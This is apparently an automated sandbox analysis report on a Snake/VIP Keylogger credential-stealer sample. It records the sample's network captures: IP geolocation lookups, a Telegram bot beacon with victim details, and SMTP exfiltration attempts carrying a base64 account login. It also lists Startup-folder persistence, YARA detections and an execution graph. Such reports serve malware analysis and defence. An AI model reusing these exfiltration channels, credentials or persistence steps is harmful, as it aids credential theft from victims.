                                                       Date: Sat, 11 Jan 2025 05:49:34 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889363
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lysRe278AtVWcLjCCd%2BvCAQzwsTDidUUY1qvb7yeoyaWpDXKuHVoNJQp28rBi1ukses64R4C0%2B6d2I7JlOy6ncyoSuWm3VMv6X2lAznguZYhmeb4lLCmFFCWHdMgGWzIGzvBe8Nc"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fd27ea3c327-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1617&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1785932&cwnd=189&unsent_bytes=0&cid=0b6fcd2b6c87604d&ts=135&x=0"
2025-01-11 05:49:34 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.9  49953        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:35 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-11 05:49:35 UTC  859                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:35 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889364
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d85g7i2In4ylQwkmziq4Q4NIxhFC37%2F9BNZSTRE%2FWp0QYyu5dakFu%2F4I31sZCZwExcDjj8Uht9OGMVIhR9MZidOBjAtmVN9qtVnRccMZeLzIeFmN4l3Lc2n%2FQxz%2FSmzAWoMgnk11"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fda5d158cda-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1806&rtt_var=677&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=243&unsent_bytes=0&cid=b8f2fba744f3548c&ts=140&x=0"
2025-01-11 05:49:35 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49963 | 104.21.32.1 | 443 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:36 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-11 05:49:37 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 05:49:37 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1889366
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYwfVqbb%2By3B9K7fV7S2uKXKg3qNaoj%2BjMn%2FTy1hq8Z8x%2FBr9z2nxryjcwaAuRNKzOaLT2v3aeTetncVjkc71iJD9uTsiuVndWJSlqnwvtEJTvv3NlqTKG6s5UP0v%2FdasybNYGC1"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90029fe2384dc327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1728&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1681059&cwnd=189&unsent_bytes=0&cid=1873b66b514378ef&ts=149&x=0"
2025-01-11 05:49:37 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49969 | 149.154.167.220 | 443 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:37 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-11 05:49:37 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 05:49:37 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 05:49:37 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 11, 2025 06:49:29.621413946 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 220 acadental.com ESMTP Postfix (Ubuntu)
Jan 11, 2025 06:49:29.624731064 CET | 49904 | 587 | 192.168.2.9 | 3.130.71.34 | EHLO 549163
Jan 11, 2025 06:49:29.742240906 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 250-acadental.com
    250-PIPELINING
    250-SIZE 30971520
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 SMTPUTF8
Jan 11, 2025 06:49:29.751265049 CET | 49904 | 587 | 192.168.2.9 | 3.130.71.34 | AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
Jan 11, 2025 06:49:29.869220972 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 334 UGFzc3dvcmQ6
Jan 11, 2025 06:49:33.393220901 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 11, 2025 06:49:33.397207975 CET | 49904 | 587 | 192.168.2.9 | 3.130.71.34 | MAIL FROM:<shipping@acadental.com>
Jan 11, 2025 06:49:33.519442081 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 250 2.1.0 Ok
Jan 11, 2025 06:49:33.519679070 CET | 49904 | 587 | 192.168.2.9 | 3.130.71.34 | RCPT TO:<enquiry.zamehinc@gmail.com>
Jan 11, 2025 06:49:33.637856960 CET | 587 | 49904 | 3.130.71.34 | 192.168.2.9 | 501 5.5.2 <549163>: Helo command rejected: Invalid name
Jan 11, 2025 06:49:43.792289972 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 220 acadental.com ESMTP Postfix (Ubuntu)
Jan 11, 2025 06:49:43.792515993 CET | 50009 | 587 | 192.168.2.9 | 3.130.71.34 | EHLO 549163
Jan 11, 2025 06:49:44.080157995 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 250-acadental.com
    250-PIPELINING
    250-SIZE 30971520
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 SMTPUTF8
Jan 11, 2025 06:49:44.080461979 CET | 50009 | 587 | 192.168.2.9 | 3.130.71.34 | AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
Jan 11, 2025 06:49:48.199358940 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 334 UGFzc3dvcmQ6
Jan 11, 2025 06:49:52.112340927 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 11, 2025 06:49:52.112689972 CET | 50009 | 587 | 192.168.2.9 | 3.130.71.34 | MAIL FROM:<shipping@acadental.com>
Jan 11, 2025 06:49:52.232073069 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 250 2.1.0 Ok
Jan 11, 2025 06:49:52.232239008 CET | 50009 | 587 | 192.168.2.9 | 3.130.71.34 | RCPT TO:<enquiry.zamehinc@gmail.com>
Jan 11, 2025 06:49:52.352147102 CET | 587 | 50009 | 3.130.71.34 | 192.168.2.9 | 501 5.5.2 <549163>: Helo command rejected: Invalid name


Target ID: 0
Start time: 00:49:02
Start date: 11/01/2025
Path: C:\Users\user\Desktop\ty1nyFUMlo.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Imagebase: 0x510000
File size: 1'096'704 bytes
MD5 hash: A3D99BCF752D0B63FA8D5515A4765777
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 00:49:05
Start date: 11/01/2025
Path: C:\Users\user\AppData\Local\translucently\enterogenous.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Imagebase: 0xa30000
File size: 1'096'704 bytes
MD5 hash: A3D99BCF752D0B63FA8D5515A4765777
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 74%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 00:49:08
Start date: 11/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Imagebase: 0xeb0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 5
Start time: 00:49:19
Start date: 11/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
Imagebase: 0x7ff76d940000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:49:20
Start date: 11/01/2025
Path: C:\Users\user\AppData\Local\translucently\enterogenous.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
Imagebase: 0xa30000
File size: 1'096'704 bytes
MD5 hash: A3D99BCF752D0B63FA8D5515A4765777
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:00:49:24
                                                                                                                      Start date:11/01/2025
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                                                                                                                      Imagebase:0xf30000
                                                                                                                      File size:45'984 bytes
                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3794762480.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.8%
                                                                                                                        Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                        Signature Coverage:4.8%
                                                                                                                        Total number of Nodes:1977
                                                                                                                        Total number of Limit Nodes:54
96961->96894 96963 54f89b __fread_nolock 26 API calls 96962->96963 96964 54565e 96963->96964 96965 545663 96964->96965 96993 542d74 38 API calls 3 library calls 96964->96993 96965->96922 96965->96923 96967 545686 96967->96965 96968 5456a4 GetConsoleMode 96967->96968 96968->96965 96969->96908 96970->96915 96971->96940 96972->96914 96973->96921 96974->96940 96975->96913 96976->96936 96977->96936 96978->96939 96979->96939 96980->96939 96981->96952 96982->96940 96983->96940 96984->96944 96985->96940 96987 530a97 IsProcessorFeaturePresent 96986->96987 96988 530a95 96986->96988 96990 530c5d 96987->96990 96988->96907 96994 530c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96990->96994 96992 530d40 96992->96907 96993->96967 96994->96992 97003 548585 96995->97003 96997 54862b 96997->96870 96998->96863 96999->96870 97000->96867 97001->96871 97002->96870 97004 548591 ___scrt_is_nonwritable_in_current_image 97003->97004 97014 545147 EnterCriticalSection 97004->97014 97006 54859f 97007 5485c6 97006->97007 97008 5485d1 97006->97008 97015 5486ae 97007->97015 97030 53f2d9 20 API calls _free 97008->97030 97011 5485cc 97031 5485fb LeaveCriticalSection __wsopen_s 97011->97031 97013 5485ee __fread_nolock 97013->96997 97014->97006 97032 5453c4 97015->97032 97017 5486be 97018 5486c4 97017->97018 97020 5486f6 97017->97020 97022 5453c4 __wsopen_s 26 API calls 97017->97022 97045 545333 21 API calls 3 library calls 97018->97045 97020->97018 97023 5453c4 __wsopen_s 26 API calls 97020->97023 97021 54871c 97024 54873e 97021->97024 97046 53f2a3 20 API calls 2 library calls 97021->97046 97025 5486ed 97022->97025 97026 548702 CloseHandle 97023->97026 97024->97011 97028 5453c4 __wsopen_s 26 API calls 97025->97028 97026->97018 97029 54870e GetLastError 97026->97029 97028->97020 97029->97018 97030->97011 97031->97013 97033 5453d1 97032->97033 97035 5453e6 97032->97035 97047 53f2c6 20 API calls _free 97033->97047 97039 54540b 97035->97039 97049 53f2c6 20 
API calls _free 97035->97049 97036 5453d6 97048 53f2d9 20 API calls _free 97036->97048 97039->97017 97040 545416 97050 53f2d9 20 API calls _free 97040->97050 97041 5453de 97041->97017 97043 54541e 97051 5427ec 26 API calls ___std_exception_copy 97043->97051 97045->97021 97046->97024 97047->97036 97048->97041 97049->97040 97050->97043 97051->97041 97052 513156 97055 513170 97052->97055 97056 513187 97055->97056 97057 5131eb 97056->97057 97058 51318c 97056->97058 97099 5131e9 97056->97099 97060 5131f1 97057->97060 97061 552dfb 97057->97061 97062 513265 PostQuitMessage 97058->97062 97063 513199 97058->97063 97059 5131d0 DefWindowProcW 97064 51316a 97059->97064 97065 5131f8 97060->97065 97066 51321d SetTimer RegisterWindowMessageW 97060->97066 97111 5118e2 10 API calls 97061->97111 97062->97064 97068 5131a4 97063->97068 97069 552e7c 97063->97069 97074 513201 KillTimer 97065->97074 97075 552d9c 97065->97075 97066->97064 97070 513246 CreatePopupMenu 97066->97070 97071 552e68 97068->97071 97072 5131ae 97068->97072 97116 57bf30 34 API calls ___scrt_fastfail 97069->97116 97070->97064 97100 57c161 97071->97100 97078 552e4d 97072->97078 97079 5131b9 97072->97079 97107 5130f2 Shell_NotifyIconW ___scrt_fastfail 97074->97107 97081 552dd7 MoveWindow 97075->97081 97082 552da1 97075->97082 97076 552e1c 97112 52e499 42 API calls 97076->97112 97078->97059 97115 570ad7 22 API calls 97078->97115 97085 5131c4 97079->97085 97086 513253 97079->97086 97080 552e8e 97080->97059 97080->97064 97081->97064 97087 552da7 97082->97087 97088 552dc6 SetFocus 97082->97088 97085->97059 97113 5130f2 Shell_NotifyIconW ___scrt_fastfail 97085->97113 97109 51326f 44 API calls ___scrt_fastfail 97086->97109 97087->97085 97091 552db0 97087->97091 97088->97064 97089 513214 97108 513c50 DeleteObject DestroyWindow 97089->97108 97110 5118e2 10 API calls 97091->97110 97094 513263 97094->97064 97097 552e41 97114 513837 49 API calls ___scrt_fastfail 97097->97114 97099->97059 97101 57c276 97100->97101 97102 57c179 
___scrt_fastfail 97100->97102 97101->97064 97117 513923 97102->97117 97104 57c25f KillTimer SetTimer 97104->97101 97105 57c1a0 97105->97104 97106 57c251 Shell_NotifyIconW 97105->97106 97106->97104 97107->97089 97108->97064 97109->97094 97110->97064 97111->97076 97112->97085 97113->97097 97114->97099 97115->97099 97116->97080 97118 513a13 97117->97118 97119 51393f 97117->97119 97118->97105 97139 516270 97119->97139 97122 553393 LoadStringW 97125 5533ad 97122->97125 97123 51395a 97124 516b57 22 API calls 97123->97124 97126 51396f 97124->97126 97129 51a8c7 22 API calls 97125->97129 97133 513994 ___scrt_fastfail 97125->97133 97127 5533c9 97126->97127 97128 51397c 97126->97128 97131 516350 22 API calls 97127->97131 97128->97125 97130 513986 97128->97130 97129->97133 97144 516350 97130->97144 97134 5533d7 97131->97134 97136 5139f9 Shell_NotifyIconW 97133->97136 97134->97133 97153 5133c6 97134->97153 97136->97118 97137 5533f9 97138 5133c6 22 API calls 97137->97138 97138->97133 97140 52fe0b 22 API calls 97139->97140 97141 516295 97140->97141 97142 52fddb 22 API calls 97141->97142 97143 51394d 97142->97143 97143->97122 97143->97123 97145 516362 97144->97145 97146 554a51 97144->97146 97162 516373 97145->97162 97172 514a88 22 API calls __fread_nolock 97146->97172 97149 51636e 97149->97133 97150 554a5b 97151 554a67 97150->97151 97152 51a8c7 22 API calls 97150->97152 97152->97151 97154 5133dd 97153->97154 97155 5530bb 97153->97155 97178 5133ee 97154->97178 97157 52fddb 22 API calls 97155->97157 97158 5530c5 _wcslen 97157->97158 97160 52fe0b 22 API calls 97158->97160 97159 5133e8 97159->97137 97161 5530fe __fread_nolock 97160->97161 97164 516382 97162->97164 97169 5163b6 __fread_nolock 97162->97169 97163 554a82 97166 52fddb 22 API calls 97163->97166 97164->97163 97165 5163a9 97164->97165 97164->97169 97173 51a587 97165->97173 97168 554a91 97166->97168 97170 52fe0b 22 API calls 97168->97170 97169->97149 97171 554ac5 __fread_nolock 97170->97171 97172->97150 97174 51a59d 
97173->97174 97177 51a598 __fread_nolock 97173->97177 97175 55f80f 97174->97175 97176 52fe0b 22 API calls 97174->97176 97176->97177 97177->97169 97179 5133fe _wcslen 97178->97179 97180 513411 97179->97180 97181 55311d 97179->97181 97183 51a587 22 API calls 97180->97183 97182 52fddb 22 API calls 97181->97182 97184 553127 97182->97184 97185 51341e __fread_nolock 97183->97185 97186 52fe0b 22 API calls 97184->97186 97185->97159 97187 553157 __fread_nolock 97186->97187 97188 5303fb 97189 530407 ___scrt_is_nonwritable_in_current_image 97188->97189 97217 52feb1 97189->97217 97191 53040e 97192 530561 97191->97192 97195 530438 97191->97195 97244 53083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97192->97244 97194 530568 97245 534e52 28 API calls _abort 97194->97245 97206 530477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97195->97206 97228 54247d 97195->97228 97197 53056e 97246 534e04 28 API calls _abort 97197->97246 97201 530576 97202 530457 97204 5304d8 97236 530959 97204->97236 97206->97204 97240 534e1a 38 API calls 2 library calls 97206->97240 97208 5304de 97209 5304f3 97208->97209 97241 530992 GetModuleHandleW 97209->97241 97211 5304fa 97211->97194 97212 5304fe 97211->97212 97213 530507 97212->97213 97242 534df5 28 API calls _abort 97212->97242 97243 530040 13 API calls 2 library calls 97213->97243 97216 53050f 97216->97202 97218 52feba 97217->97218 97247 530698 IsProcessorFeaturePresent 97218->97247 97220 52fec6 97248 532c94 10 API calls 3 library calls 97220->97248 97222 52fecb 97227 52fecf 97222->97227 97249 542317 97222->97249 97225 52fee6 97225->97191 97227->97191 97229 542494 97228->97229 97230 530a8c CatchGuardHandler 5 API calls 97229->97230 97231 530451 97230->97231 97231->97202 97232 542421 97231->97232 97233 542450 97232->97233 97234 530a8c CatchGuardHandler 5 API calls 97233->97234 97235 542479 97234->97235 97235->97206 97300 532340 97236->97300 97239 53097f 
